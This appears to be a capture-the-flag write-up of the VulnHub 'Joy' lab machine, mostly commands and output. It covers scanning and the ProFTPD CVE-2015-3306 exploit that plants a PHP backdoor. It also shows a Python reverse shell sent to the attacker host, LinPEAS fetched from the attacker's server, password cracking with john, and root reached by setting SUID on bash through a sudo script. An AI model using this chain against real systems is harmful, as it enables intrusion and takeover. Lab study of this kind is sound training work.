VulnHub : Digital World : Joy
4 July, 2021
Machine Link: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
Beginning with an nmap scan
# nmap -A -sC -sV -O -p 1-65535 192.168.56.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 13:22 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for kioptrix.com (192.168.56.105)
Host is up (0.00090s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE CAPA UIDL RESP-CODES PIPELINING SASL TOP STLS
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: have more Pre-login post-login IDLE listed ID capabilities IMAP4rev1 SASL-IR OK STARTTLS LITERAL+ ENABLE LOGINDISABLEDA0001 LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:2E:E9:CA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h49m58s, deviation: 4h37m07s, median: 5h29m58s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2021-07-04T06:52:30+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-03T22:52:31
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.90 ms kioptrix.com (192.168.56.105)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.33 seconds
Starting off with the FTP port 21, I was able to login anonymously
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> ls download/
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> ls upload/
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 3322 Jul 4 12:18 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
226 Transfer complete
# cat upload/directory
Patrick's Directory
total 140
drwxr-xr-x 18 patrick patrick 4096 Jul 4 20:20 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 0 Jul 4 20:10 5vFhVpFiEyMyAy2z00Rn7knYZ7uEiINF.txt
-rw-r--r-- 1 patrick patrick 24 Jul 4 20:20 84HiZ9ondgcpXPflITwK38q0pKXzVTeuI907YlTDGsE4wFY7ubVarYVgGCz02NmM.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 06:55 b522HOJkT9KmFA1o93K2Kr4A3H9wzARs.txt
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
-rw-r--r-- 1 patrick patrick 0 Jul 4 20:15 CBogqQgaktNmNwsuapUIF6BERmv7lUfb.txt
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
-rw-r--r-- 1 patrick patrick 24 Jul 4 06:55 cooNKosxFcWTM14AxNhvdMvTbdANMyXlNyg6FzgQMBA3tGI93J088EcEKN3dW6QL.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 07:10 CXB5EwfSYS4SXpc5231JEHP1hWoMpb4E.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
-rw-r--r-- 1 patrick patrick 0 Jul 4 20:20 DNjRnjWv7UaYFOlWIC01TjcMF9dws85O.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 24 Jul 4 20:05 EmMdc0KsYHPcYCZ8iDIVKhuUFQH4C5Szia1AXAob8SUd2XkN40rEH1YZhskEI8gM.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 07:00 fPmosPWpdFPAwK5od3gFIFxzCTfPRtKY.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
-rw-r--r-- 1 patrick patrick 24 Jul 4 07:05 kDkbOhj1r8bi1b2849msZNoW4fNgntbmvMADOXr9SRvVDYEFaJKXBvK4Cau8lTwn.txt
-rw-r--r-- 1 patrick patrick 24 Jul 4 06:50 KjziWyydxbcaF3A0DkiKYfCrs65v6gVjFn9XNgRwW6yjvAtQOnv8yd2MDejgINHM.txt
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
-rw-r--r-- 1 patrick patrick 24 Jul 4 07:00 MPJ07qjMgzql6OfiK7vqme6EXUy7OvifkErTaaFTyTcYTSPKK3AQftte1i1Jy3W8.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 0 Jul 4 07:05 NBFJGoXG8EFETHsQfWoeUixMYE1Iebrt.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 20:05 ovB7mlSh4LQZtg6nZmSJE3iqZl2CyaQ6.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 24 Jul 4 20:10 WFhavh5NiqNQOepFC4YbzgYVYvj1dzADdSvdWzi5mh6XtjguYfB06KM1FRQIoiFN.txt
-rw-r--r-- 1 patrick patrick 24 Jul 4 20:15 wROD9cEKiZiKLTKjEq2MdMEXs6oqUhagvYTI5mv9OcAQyYfUqdQV5ceDHkxMjIKm.txt
-rw-r--r-- 1 patrick patrick 24 Jul 4 07:10 x5v0eiE8ulm4lPmJvkELQEEGAN0lbFLrFjtZeqmoF6QxXXYdoBKIcqyWxsBYgnQe.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 06:50 Y30soZFSLN4lWc6RfLabE6FG7M2QBbE9.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
The files had some content but not much context. The only thing I could gauge was that there is a user patrick on the machine and there is a file version_control in it's home directory.
I tried out the rest of the ports and didn't find anything significant. So I tried an nmap UDP scan
# nmap -A -sC -sV -sU -O 192.168.56.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 10:52 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for kioptrix.com (192.168.56.105)
Host is up (0.00059s latency).
Not shown: 958 closed ports, 39 open|filtered ports
PORT STATE SERVICE VERSION
123/udp open ntp NTP v4 (unsynchronized)
| ntp-info:
|_
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: d1785e76ec962f5c00000000
| snmpEngineBoots: 31
|_ snmpEngineTime: 3h00m22s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 859.39 Kb sent, 859.39 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 192.168.56.105 Netmask: 255.255.255.0
| MAC address: 08:00:27:2e:e9:ca (Oracle VirtualBox virtual NIC)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 1.25 Mb sent, 1.46 Mb received
| snmp-netstat:
| TCP 0.0.0.0:21 0.0.0.0:0
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:110 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:143 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 0.0.0.0:465 0.0.0.0:0
| TCP 0.0.0.0:587 0.0.0.0:0
| TCP 0.0.0.0:993 0.0.0.0:0
| TCP 0.0.0.0:995 0.0.0.0:0
| TCP 127.0.0.1:631 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 192.168.56.105:139 192.168.56.1:39556
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:631 *:*
| UDP 0.0.0.0:1900 *:*
| UDP 0.0.0.0:5353 *:*
| UDP 0.0.0.0:33079 *:*
| UDP 0.0.0.0:36295 *:*
| UDP 0.0.0.0:36969 *:*
| UDP 127.0.0.1:123 *:*
| UDP 192.168.56.105:123 *:*
| UDP 192.168.56.105:137 *:*
| UDP 192.168.56.105:138 *:*
| UDP 192.168.56.255:137 *:*
|_ UDP 192.168.56.255:138 *:*
| snmp-processes:
| 1:
| Name: systemd
| Path: /sbin/init
****
| 660:
| Name: in.tftpd
| Path: /usr/sbin/in.tftpd
| Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick
So I have tftp running on port 36969, let's try connecting to that
# tftp 192.168.56.105 36969
tftp> get version_control
Received 419 bytes in 0.0 seconds
# cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
Checking around, ProFTPd 1.3.5 has an RCE exploit https://github.com/t0kx/exploit-CVE-2015-3306
# ./exploit.py --host 192.168.56.105 --port 21 --path "/var/www/tryingharderisjoy"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.56.105:21
[+] Target exploited, acessing shell at http://192.168.56.105/backdoor.php
[+] Running whoami: www-data
[+] Done
# curl "http://192.168.56.105/backdoor.php?cmd=whoami"
proftpd: 192.168.56.101:40414: SITE cpto /tmp/.www-data
# curl "http://192.168.56.105/backdoor.php?cmd=pwd"
proftpd: 192.168.56.101:40414: SITE cpto /tmp/./var/www/tryingharderisjoy
Using this I got a reverse shell
# curl "http://192.168.56.105/backdoor.php?cmd=python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.101%22,4242));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)'"
# nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 41790
www-data@JOY:/var/www/tryingharderisjoy$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
www-data@JOY:/var/www/tryingharderisjoy$ whoami
whoami
www-data
There was no wget or curl so I had to use python's requests to fetch linpeas
www-data@JOY:/tmp$ python -c "import requests; open('linpeas.sh', 'w').write(requests.get('http://192.168.56.101:8000/linpeas.sh').text.encode('utf-8'))"
<168.56.101:8000/linpeas.sh').text.encode('utf-8'))"
www-data@JOY:/tmp$ ls
ls
linpeas.sh
From linpeas' output
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 /var/www/tryingharderisjoy/ossec/.htpasswd
Reading /var/www/tryingharderisjoy/ossec/.htpasswd
admin:$apr1$3Jv2Ok6H$4BMdXenVBmD2E3kXe8RVL.
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwSr--r-- 1 root root 39K Jan 10 2016 /lib/uncompress.so
--- It looks like /lib/uncompress.so is using /proc/self/cmdline and you can modify it (strings line: /proc/self/cmdline)
--- It looks like /lib/uncompress.so is executing /tmp and you can impersonate it (strings line: /tmp)
--- It looks like /lib/uncompress.so is executing /usr/lib/X11/ and you can impersonate it (strings line: /usr/lib/X11/)
--- It looks like /lib/uncompress.so is executing basename and you can impersonate it (strings line: basename)
--- It looks like /lib/uncompress.so is executing chmod and you can impersonate it (strings line: chmod)
--- It looks like /lib/uncompress.so is executing chown and you can impersonate it (strings line: chown)
--- It looks like /lib/uncompress.so is executing cpio and you can impersonate it (strings line: cpio)
--- It looks like /lib/uncompress.so is executing gunzip and you can impersonate it (strings line: gunzip)
--- It looks like /lib/uncompress.so is executing patch and you can impersonate it (strings line: patch)
--- It looks like /lib/uncompress.so is executing perror and you can impersonate it (strings line: perror)
--- It looks like /lib/uncompress.so is executing rename and you can impersonate it (strings line: rename)
--- It looks like /lib/uncompress.so is executing sleep and you can impersonate it (strings line: sleep)
--- It looks like /lib/uncompress.so is executing uncompress and you can impersonate it (strings line: uncompress)
--- It looks like /lib/uncompress.so is executing xman and you can impersonate it (strings line: xman)
Using john the hash was cracked but I couldn't get it to work anywhere
# john hash --wordlist=../../HTB/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:01 DONE 0.9345g/s 89.71p/s 89.71c/s 89.71C/s 123456..yellow
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Looking at further directories, I found some credentials
$ cd /var/www/
cd /var/www/
$ ls
ls
tryingharderisjoy
$ cd tryingharderisjoy
cd tryingharderisjoy
$ ls
ls
backdoor.php ossec
$ cd ossec
cd ossec
$ ls
ls
CONTRIB README.search img lib setup.sh
LICENSE css index.php ossec_conf.php site
README htaccess_def.txt js patricksecretsofjoy tmp
$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
root's password didn't work but patrick's did
$ su root
su root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
$ su patrick
su patrick
Password: apollo098765
patrick@JOY:/var/www/tryingharderisjoy/ossec$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:/var/www/tryingharderisjoy/ossec$ whoami
whoami
patrick
patrick was allowed to run a specific script as sudo
patrick@JOY:~$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
The script was a way to change the permissions of any file. So I used it to set the SUID bit on /bin/bash
patrick@JOY:~$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../../bin/bash
../../../../bin/bash
What permissions would you like to set the file to?
4777
4777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:~$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=1000(patrick) gid=1000(patrick) euid=0(root) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
bash-4.4# whoami
whoami
root
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
author-secret.txt dovecot.crt dovecot.key proof.txt rootCA.pem
document-generator.sh dovecot.csr permissions.sh rootCA.key rootCA.srl
bash-4.4# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!